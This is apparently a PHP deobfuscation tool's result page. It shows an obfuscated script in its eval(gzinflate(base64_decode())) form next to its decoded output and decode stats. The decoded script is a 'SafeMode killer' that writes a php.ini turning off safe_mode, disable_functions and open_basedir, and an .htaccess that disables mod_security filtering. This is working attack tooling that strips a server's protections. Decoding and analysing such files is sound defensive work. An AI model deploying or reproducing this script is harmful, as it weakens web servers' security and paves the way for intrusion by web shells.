Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $X= 'LyogLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0..

Decoded Output download

echo "<right>";
echo"<FORM method='POST' action='$REQUEST_URI' enctype='multipart/form-data'>
	<p align='center'>
	<INPUT type='submit' name='Kill' value='Create [ini.php] + [php.ini] + [.htaccess] Clic Here to Kill The SafeMode ' id=input style='font-size: 12pt; font-weight: bold; border-style: inset; border-width: 1px'></p>
</form>
";
echo "<right/>";
if  (empty($_POST['Kill'] ) ) {
	}ELSE{
	$action = '?action=Kill';
echo "<html>
<br>
<head>
<meta http-equiv='pragma' content='no-cache'>
</head><body>";

$fp = fopen("php.ini","w+");
fwrite($fp,"safe_mode = Off
disable_functions  =    NONE
open_basedir = OFF ");
echo "<b>[SafeMode Done] .. :) Script By Akram Stelle</b>";
echo ("<br>");

$fp2 = fopen(".htaccess","w+");
fwrite($fp2,"
<IfModule mod_security.c>
KillFilterEngine Off
KillFilterScanPOST Off
KillFilterCheckURLEncoding Off
KillFilterCheckUnicodeEncoding Off
</IfModule>
");


echo "<b>[Mod_Security Done]</b><br>";

    echo "<font><center></td></tr><table> ";

	}

Did this file decode correctly?

Original Code

<?php $X= 'LyogLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCgkJCQkJCUF1dGhvcjogICAgIEFiZHVsIFJhaG1hbiBTaGVyemFkICh3d3cuYWZnaGFuY3liZXJzb2Z0LmNvbSkKCQkJCQkJRW1haWw6CQlpbmZvQGFmZ2hhbmN5YmVyc29mdC5jb20KCQkJCQkJQmlvZ3JhcGh5OglBYmR1bCBSYWhtYW4gU2hlcnphZCB3YXMgYm9ybiBhbmQgYnJvdWdodCB1cCBpbiBIZXJhdC1BZmdoYW5pc3RhbiBhbmQgY29tcGxldGVkIG15IHVuZGVyLWdyYWR1YXRlIHN0dWRpZXMgaW4gQ29tcHV0ZXIgU2NpZW5jZSBGYWN1bHR5IG9mIEhlcmF0IFVuaXZlcnNpdHkgaW4gMjAwNiBvYnRhaW5pbmcgbXkgQi5DLlMgZGVncmVlIGFzIHRoZSBiZXN0IG91dGdvaW5nIHNlbmlvciBzdHVkZW50IGZyb20gdGhpcyBmYWN1bHR5LgoKCQkJCQkJCQkJSGF2aW5nIGludGVsbGVjdHVhbGl0eSBpbiBDb21wdXRlciBQcm9ncmFtbWluZyBhbmQgSW5mb3JtYXRpb24gRGF0YWJhc2UgTWFuYWdlbWVudCBTeXN0ZW0sIEkgd2FzIG9mZmVyZWQgdG8gY29tbWVuY2UgdGVhY2hpbmcgaW4gQ29tcHV0ZXIgU2NpZW5jZSBGYWN1bHR5IG9mIEhlcmF0IFVuaXZlcnNpdHkuIEFmdGVyIGEgd2hpbGUgSSBqb2luZWQgQ1JTIHRvIHdvcmsgYXMgdGhlIERhdGFiYXNlIE1hbmFnZXIgZm9yIHRoZSBBREEgcHJvZ3JhbS4gSSB3b3JrZWQgZm9yIENSUyBmb3IgYSBjb3VwbGUgb2YgeWVhcnMgYWZ0ZXIgd2hpY2ggSSB3YXMgYXdhcmRlZCBhIHNjaG9sYXJzaGlwIGJ5IHRoZSBnb3Zlcm5tZW50IG9mIEdlcm1hbnkgdG8gcHVyc3VlIG15IE1hc3RlciBpbiBJbmZvcm1hdGlvbiBEYXRhYmFzZSBNYW5hZ2VtZW50IGFuZCBTb2Z0d2FyZSBFbmdpbmVlcmluZyBpbiBCZXJsaW4gYXQgVFUtQmVybGluIFVuaXZlcnNpdHkuCgoJCQkJCQkJCQlJIGFtIGN1cnJlbnRseSBhbHNvIHRlYWNoaW5nIGF0IHRoZSBIZXJhdCBVbml2ZXJzaXR5IGFzIHdlbGwgYXMgYWN0aW5nIGFzIHRoZSBoZWFkIG9mIEluZm9ybWF0aW9uIFN5c3RlbXMgTWFuYWdlciBib3RoIGluIENSUyBhbmQgSGVyYXQgVW5pdmVyc2l0eSB0byBzdXBwb3J0IHRoZSBlZHVjYXRpb25hbCBuZWVkcy4KCQkJCQkJCQktLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0gKi8='; eval(gzinflate(base64_decode('bZNtb9owEMdfF4nvcIqQTNUCWl/ShGnrglatLR2BVwhFjnMhVhPHS5wyNvW77+xQuk0FKbHvyff/+YIir8Dza7nLzcy77veQDJ4/XyzvoUSTV2nAHhfRigEXRlYqYINl+H0dRqt4vbxlgEqYg8aAlW1hpOa1mWRVXY5Sbjib9XtnvgZeyB0lClQG6854+/C4XkGX2bRJKQ0DxUvafZNFweCZFy1tbmrkBmEjlRzrXG/hAjb0HtPerce54UJg02zhppACvmKNYCqwRWCVI0Q8w/sqRWAg00Aq3RpozKGg2lmlzKiRv3AKH660uQZn2KMlMYWkKtJretYp1iOXMQWpGjQn416mJqdc/ZPN/IkmWb6TTotXjq9gJ46szACGWGpzGA5iy3TTid3COf1/E5aX8C4K7WLQwYYA2Mcjdxf6Vjc3ZWGPTGr7zJGn9k03xiE3Ro/wRyufA6Zrvis5A0HaCH/AVDUSXOTIXL8uz0+q9OA67PcGmaZDs0qjGnpH0t6lt7/wzsmf7WtpcEhBl15DZOPSog1gkWX9XiobnhQYZ61yHTdAHvo9LB7Cfs9WjBPeYCprmzGfgyt5lJPMNqer+lIp3MJ4DNNziEQttYHPB/j0VPMSIoNFgf4kOc0qDD0LwRVz/V+9CTiNx3sSri49QnCb0ZltgUBS4gZFS+7DWBAdC3wuCxrZUO2kwk7lmzUSXNlb/N9+k6N4Wi/vQiWqVKrd+34lyYv/xviT127sDHWC/iZEvjg6tthRsiCcehdraR+j7SzP/O6Lo+k0qX3QytgrmkEXf/bS7/0B')));?>

Function Calls

gzinflate 1
base64_decode 1

Variables

$X LyogLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t..

Stats

MD5 2f8c1171a0611ce290c3b6c075d954dd
Eval Count 1
Decode Time 84 ms